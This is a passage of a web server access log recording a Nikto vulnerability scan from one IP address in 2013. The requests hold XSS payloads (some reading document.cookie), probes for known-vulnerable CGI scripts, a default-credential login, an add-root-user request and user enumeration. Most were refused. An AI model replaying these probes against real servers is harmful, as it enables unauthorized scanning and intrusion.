  1394. 84.56.69.222 - - [23/Oct/2013:15:42:40 +0400] "GET /cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\\\">< script>alert(1)/script><\\\" HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000903)"
  1395. 84.56.69.222 - - [23/Oct/2013:15:42:40 +0400] "GET /chat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000904)"
  1396. 84.56.69.222 - - [23/Oct/2013:15:42:47 +0400] "GET /cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000905)"
  1397. 84.56.69.222 - - [23/Oct/2013:15:42:47 +0400] "GET /cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000906)"
  1398. 84.56.69.222 - - [23/Oct/2013:15:42:48 +0400] "GET /webcgi/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000907)"
  1399. 84.56.69.222 - - [23/Oct/2013:15:42:48 +0400] "GET /scripts/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000907)"
  1400. 84.56.69.222 - - [23/Oct/2013:15:42:50 +0400] "GET /cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E HTTP/1.1" 404 295 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000908)"
  1401. 84.56.69.222 - - [23/Oct/2013:15:42:50 +0400] "GET /calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000909)"
  1402. 84.56.69.222 - - [23/Oct/2013:15:42:50 +0400] "GET /ca000007.pl?ACTION=SHOWCART&REFPAGE=\\\"><script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000910)"
  1403. 84.56.69.222 - - [23/Oct/2013:15:43:25 +0400] "GET /bb000001.pl<script>alert('Vulnerable')</script> HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000912)"
  1404. 84.56.69.222 - - [23/Oct/2013:15:43:36 +0400] "GET /article.php?sid=\\\"><Img Src=javascript:alert('Vulnerable')><Img Src=\\\" HTTP/1.1" 403 1362 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000913)"
  1405. 84.56.69.222 - - [23/Oct/2013:15:43:36 +0400] "GET /article.cfm?id=1'<script>alert(document.cookie);</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000914)"
  1406. 84.56.69.222 - - [23/Oct/2013:15:43:37 +0400] "GET /apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000915)"
  1407. 84.56.69.222 - - [23/Oct/2013:15:43:37 +0400] "GET /anthill/login.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000916)"
  1408. 84.56.69.222 - - [23/Oct/2013:15:43:37 +0400] "GET /admin/login.php?path=\\\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000917)"
  1409. 84.56.69.222 - - [23/Oct/2013:15:43:38 +0400] "GET /addressbook/index.php?surname=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000918)"
  1410. 84.56.69.222 - - [23/Oct/2013:15:43:39 +0400] "GET /addressbook/index.php?name=<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000919)"
  1411. 84.56.69.222 - - [23/Oct/2013:15:43:39 +0400] "GET /add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000920)"
  1412. 84.56.69.222 - - [23/Oct/2013:15:43:40 +0400] "GET /a?<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000921)"
  1413. 84.56.69.222 - - [23/Oct/2013:15:43:40 +0400] "GET /a.jsp/<script>alert('Vulnerable')</script> HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000922)"
  1414. 84.56.69.222 - - [23/Oct/2013:15:43:40 +0400] "GET /?mod=<script>alert(document.cookie)</script>&op=browse HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000923)"
  1415. 84.56.69.222 - - [23/Oct/2013:15:43:40 +0400] "GET /<script>alert('Vulnerable')</script>.thtml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000924)"
  1416. 84.56.69.222 - - [23/Oct/2013:15:43:41 +0400] "GET /<script>alert('Vulnerable')</script>.shtml HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000925)"
  1417. 84.56.69.222 - - [23/Oct/2013:15:43:41 +0400] "GET /<script>alert('Vulnerable')</script>.jsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000926)"
  1418. 84.56.69.222 - - [23/Oct/2013:15:43:41 +0400] "GET /<script>alert('Vulnerable')</script>.aspx HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000927)"
  1419. 84.56.69.222 - - [23/Oct/2013:15:43:41 +0400] "GET //profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000928)"
  1420. 84.56.69.222 - - [23/Oct/2013:15:43:42 +0400] "GET //comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000929)"
  1421. 84.56.69.222 - - [23/Oct/2013:15:43:42 +0400] "GET /&lt;script&gt;alert('Vulnerable');&lt;/script&gt; HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000930)"
  1422. 84.56.69.222 - - [23/Oct/2013:15:43:42 +0400] "GET /%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000931)"
  1423. 84.56.69.222 - - [23/Oct/2013:15:43:43 +0400] "GET /%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000932)"
  1424. 84.56.69.222 - - [23/Oct/2013:15:43:43 +0400] "GET /%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000933)"
  1425. 84.56.69.222 - - [23/Oct/2013:15:43:46 +0400] "GET /%22%3cscript%3ealert(%22xss%22)%3c/script%3e HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000934)"
  1426. 84.56.69.222 - - [23/Oct/2013:15:43:46 +0400] "GET /%0a%0a<script>alert(\\\"Vulnerable\\\")</script>.jsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000935)"
  1427. 84.56.69.222 - - [23/Oct/2013:15:43:46 +0400] "GET /webcgi/title.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000936)"
  1428. 84.56.69.222 - - [23/Oct/2013:15:43:47 +0400] "GET /scripts/title.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000936)"
  1429. 84.56.69.222 - - [23/Oct/2013:15:43:47 +0400] "GET /webcgi/compatible.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000937)"
  1430. 84.56.69.222 - - [23/Oct/2013:15:43:47 +0400] "GET /scripts/compatible.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000937)"
  1431. 84.56.69.222 - - [23/Oct/2013:15:43:48 +0400] "GET /add_user.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000938)"
  1432. 84.56.69.222 - - [23/Oct/2013:15:43:48 +0400] "GET /webcgi/probecontrol.cgi?command=enable&username=cancer&password=killer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000939)"
  1433. 84.56.69.222 - - [23/Oct/2013:15:43:48 +0400] "GET /scripts/probecontrol.cgi?command=enable&username=cancer&password=killer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000939)"
  1434. 84.56.69.222 - - [23/Oct/2013:15:43:49 +0400] "GET /webcgi/probecontrol.cgi?command=enable&userNikto=cancer&password=killer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000939)"
  1435. 84.56.69.222 - - [23/Oct/2013:15:43:49 +0400] "GET /scripts/probecontrol.cgi?command=enable&userNikto=cancer&password=killer HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000939)"
  1436. 84.56.69.222 - - [23/Oct/2013:15:43:50 +0400] "GET /webcgi/retrieve_password.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000940)"
  1437. 84.56.69.222 - - [23/Oct/2013:15:43:50 +0400] "GET /scripts/retrieve_password.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000940)"
  1438. 84.56.69.222 - - [23/Oct/2013:15:43:50 +0400] "GET /webcgi/wwwadmin.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000941)"
  1439. 84.56.69.222 - - [23/Oct/2013:15:43:51 +0400] "GET /scripts/wwwadmin.pl HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000941)"
  1440. 84.56.69.222 - - [23/Oct/2013:15:43:51 +0400] "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000942)"
  1441. 84.56.69.222 - - [23/Oct/2013:15:43:51 +0400] "GET /cfdocs/expeval/sendmail.cfm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000943)"
  1442. 84.56.69.222 - - [23/Oct/2013:15:43:52 +0400] "GET /cgi-bin/bigconf.cgi HTTP/1.1" 404 279 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000944)"
  1443. 84.56.69.222 - - [23/Oct/2013:15:43:52 +0400] "GET /webcgi/webmap.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000945)"
  1444. 84.56.69.222 - - [23/Oct/2013:15:43:53 +0400] "GET /scripts/webmap.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000945)"
  1445. 84.56.69.222 - - [23/Oct/2013:15:43:53 +0400] "GET /webcgi/wwwwais HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000946)"
  1446. 84.56.69.222 - - [23/Oct/2013:15:43:53 +0400] "GET /scripts/wwwwais HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000946)"
  1447. 84.56.69.222 - - [23/Oct/2013:15:43:53 +0400] "GET /ammerum/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000947)"
  1448. 84.56.69.222 - - [23/Oct/2013:15:43:56 +0400] "GET /ariadne/ HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000948)"
  1449. 84.56.69.222 - - [23/Oct/2013:15:43:56 +0400] "GET /cbms/cbmsfoot.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000949)"
  1450. 84.56.69.222 - - [23/Oct/2013:15:43:56 +0400] "GET /cbms/changepass.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000950)"
  1451. 84.56.69.222 - - [23/Oct/2013:15:43:56 +0400] "GET /cbms/editclient.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000951)"
  1452. 84.56.69.222 - - [23/Oct/2013:15:43:56 +0400] "GET /cbms/passgen.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000952)"
  1453. 84.56.69.222 - - [23/Oct/2013:15:43:56 +0400] "GET /cbms/realinv.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000953)"
  1454. 84.56.69.222 - - [23/Oct/2013:15:43:57 +0400] "GET /cbms/usersetup.php HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000954)"
  1455. 84.56.69.222 - - [23/Oct/2013:15:43:57 +0400] "GET /webcgi/admin/admin.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000955)"
  1456. 84.56.69.222 - - [23/Oct/2013:15:43:57 +0400] "GET /scripts/admin/admin.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000955)"
  1457. 84.56.69.222 - - [23/Oct/2013:15:43:57 +0400] "GET /webcgi/admin/setup.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000956)"
  1458. 84.56.69.222 - - [23/Oct/2013:15:43:57 +0400] "GET /scripts/admin/setup.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000956)"
  1459. 84.56.69.222 - - [23/Oct/2013:15:43:57 +0400] "GET /webcgi/mt-static/mt-load.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000957)"
  1460. 84.56.69.222 - - [23/Oct/2013:15:43:57 +0400] "GET /scripts/mt-static/mt-load.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000957)"
  1461. 84.56.69.222 - - [23/Oct/2013:15:43:57 +0400] "GET /webcgi/mt-static/mt.cfg HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000958)"
  1462. 84.56.69.222 - - [23/Oct/2013:15:43:57 +0400] "GET /scripts/mt-static/mt.cfg HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000958)"
  1463. 84.56.69.222 - - [23/Oct/2013:15:43:58 +0400] "GET /webcgi/mt/mt-load.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000959)"
  1464. 84.56.69.222 - - [23/Oct/2013:15:43:59 +0400] "GET /scripts/mt/mt-load.cgi HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000959)"
  1465. 84.56.69.222 - - [23/Oct/2013:15:43:59 +0400] "GET /webcgi/mt/mt.cfg HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000960)"
  1466. 84.56.69.222 - - [23/Oct/2013:15:44:00 +0400] "GET /scripts/mt/mt.cfg HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000960)"
  1467. 84.56.69.222 - - [23/Oct/2013:15:44:00 +0400] "GET /cgi-bin-sdb/printenv HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000961)"
  1468. 84.56.69.222 - - [23/Oct/2013:15:44:01 +0400] "GET /ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000962)"
  1469. 84.56.69.222 - - [23/Oct/2013:15:44:01 +0400] "GET /db/users.dat HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000963)"
  1470. 84.56.69.222 - - [23/Oct/2013:15:44:01 +0400] "GET /webcgi/cgiwrap/~adm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1471. 84.56.69.222 - - [23/Oct/2013:15:44:01 +0400] "GET /scripts/cgiwrap/~adm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1472. 84.56.69.222 - - [23/Oct/2013:15:44:01 +0400] "GET /webcgi/cgiwrap/~bin HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1473. 84.56.69.222 - - [23/Oct/2013:15:44:02 +0400] "GET /scripts/cgiwrap/~bin HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1474. 84.56.69.222 - - [23/Oct/2013:15:44:02 +0400] "GET /webcgi/cgiwrap/~daemon HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1475. 84.56.69.222 - - [23/Oct/2013:15:44:02 +0400] "GET /scripts/cgiwrap/~daemon HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1476. 84.56.69.222 - - [23/Oct/2013:15:44:02 +0400] "GET /webcgi/cgiwrap/~ftp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1477. 84.56.69.222 - - [23/Oct/2013:15:44:02 +0400] "GET /scripts/cgiwrap/~ftp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1478. 84.56.69.222 - - [23/Oct/2013:15:44:02 +0400] "GET /webcgi/cgiwrap/~guest HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1479. 84.56.69.222 - - [23/Oct/2013:15:44:03 +0400] "GET /scripts/cgiwrap/~guest HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1480. 84.56.69.222 - - [23/Oct/2013:15:44:03 +0400] "GET /webcgi/cgiwrap/~listen HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1481. 84.56.69.222 - - [23/Oct/2013:15:44:03 +0400] "GET /scripts/cgiwrap/~listen HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1482. 84.56.69.222 - - [23/Oct/2013:15:44:03 +0400] "GET /webcgi/cgiwrap/~lp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1483. 84.56.69.222 - - [23/Oct/2013:15:44:04 +0400] "GET /scripts/cgiwrap/~lp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1484. 84.56.69.222 - - [23/Oct/2013:15:44:05 +0400] "GET /webcgi/cgiwrap/~mysql HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1485. 84.56.69.222 - - [23/Oct/2013:15:44:05 +0400] "GET /scripts/cgiwrap/~mysql HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1486. 84.56.69.222 - - [23/Oct/2013:15:44:05 +0400] "GET /webcgi/cgiwrap/~noaccess HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1487. 84.56.69.222 - - [23/Oct/2013:15:44:05 +0400] "GET /scripts/cgiwrap/~noaccess HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1488. 84.56.69.222 - - [23/Oct/2013:15:44:06 +0400] "GET /webcgi/cgiwrap/~nobody HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1489. 84.56.69.222 - - [23/Oct/2013:15:44:07 +0400] "GET /scripts/cgiwrap/~nobody HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1490. 84.56.69.222 - - [23/Oct/2013:15:44:07 +0400] "GET /webcgi/cgiwrap/~nobody4 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1491. 84.56.69.222 - - [23/Oct/2013:15:44:08 +0400] "GET /scripts/cgiwrap/~nobody4 HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1492. 84.56.69.222 - - [23/Oct/2013:15:44:25 +0400] "GET /webcgi/cgiwrap/~nuucp HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1493. 84.56.69.222 - - [23/Oct/2013:15:44:26 +0400] "GET /scripts/cgiwrap/~nuucp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1494. 84.56.69.222 - - [23/Oct/2013:15:44:27 +0400] "GET /webcgi/cgiwrap/~operator HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1495. 84.56.69.222 - - [23/Oct/2013:15:44:27 +0400] "GET /scripts/cgiwrap/~operator HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1496. 84.56.69.222 - - [23/Oct/2013:15:44:27 +0400] "GET /webcgi/cgiwrap/~root HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1497. 84.56.69.222 - - [23/Oct/2013:15:44:27 +0400] "GET /scripts/cgiwrap/~root HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1498. 84.56.69.222 - - [23/Oct/2013:15:44:27 +0400] "GET /webcgi/cgiwrap/~smmsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1499. 84.56.69.222 - - [23/Oct/2013:15:44:28 +0400] "GET /scripts/cgiwrap/~smmsp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1500. 84.56.69.222 - - [23/Oct/2013:15:44:28 +0400] "GET /webcgi/cgiwrap/~smtp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1501. 84.56.69.222 - - [23/Oct/2013:15:44:30 +0400] "GET /scripts/cgiwrap/~smtp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1502. 84.56.69.222 - - [23/Oct/2013:15:44:43 +0400] "GET /webcgi/cgiwrap/~sshd HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1503. 84.56.69.222 - - [23/Oct/2013:15:44:44 +0400] "GET /scripts/cgiwrap/~sshd HTTP/1.1" 302 - "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1504. 84.56.69.222 - - [23/Oct/2013:15:44:45 +0400] "GET /webcgi/cgiwrap/~sys HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1505. 84.56.69.222 - - [23/Oct/2013:15:44:45 +0400] "GET /scripts/cgiwrap/~sys HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1506. 84.56.69.222 - - [23/Oct/2013:15:44:45 +0400] "GET /webcgi/cgiwrap/~test HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1507. 84.56.69.222 - - [23/Oct/2013:15:44:45 +0400] "GET /scripts/cgiwrap/~test HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1508. 84.56.69.222 - - [23/Oct/2013:15:44:45 +0400] "GET /webcgi/cgiwrap/~unknown HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1509. 84.56.69.222 - - [23/Oct/2013:15:44:45 +0400] "GET /scripts/cgiwrap/~unknown HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1510. 84.56.69.222 - - [23/Oct/2013:15:44:45 +0400] "GET /webcgi/cgiwrap/~uucp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1511. 84.56.69.222 - - [23/Oct/2013:15:44:46 +0400] "GET /scripts/cgiwrap/~uucp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1512. 84.56.69.222 - - [23/Oct/2013:15:44:46 +0400] "GET /webcgi/cgiwrap/~web HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1513. 84.56.69.222 - - [23/Oct/2013:15:44:46 +0400] "GET /scripts/cgiwrap/~web HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1514. 84.56.69.222 - - [23/Oct/2013:15:44:46 +0400] "GET /webcgi/cgiwrap/~www HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1515. 84.56.69.222 - - [23/Oct/2013:15:44:46 +0400] "GET /scripts/cgiwrap/~www HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1516. 84.56.69.222 - - [23/Oct/2013:15:44:46 +0400] "GET /webcgi/cgiwrap/~adm HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1517. 84.56.69.222 - - [23/Oct/2013:15:44:47 +0400] "GET /webcgi/cgiwrap/~bin HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1518. 84.56.69.222 - - [23/Oct/2013:15:44:47 +0400] "GET /webcgi/cgiwrap/~daemon HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1519. 84.56.69.222 - - [23/Oct/2013:15:44:48 +0400] "GET /webcgi/cgiwrap/~ftp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1520. 84.56.69.222 - - [23/Oct/2013:15:44:48 +0400] "GET /webcgi/cgiwrap/~guest HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1521. 84.56.69.222 - - [23/Oct/2013:15:44:48 +0400] "GET /webcgi/cgiwrap/~listen HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
  1522. 84.56.69.222 - - [23/Oct/2013:15:44:48 +0400] "GET /webcgi/cgiwrap/~lp HTTP/1.1" 403 761 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000964)"
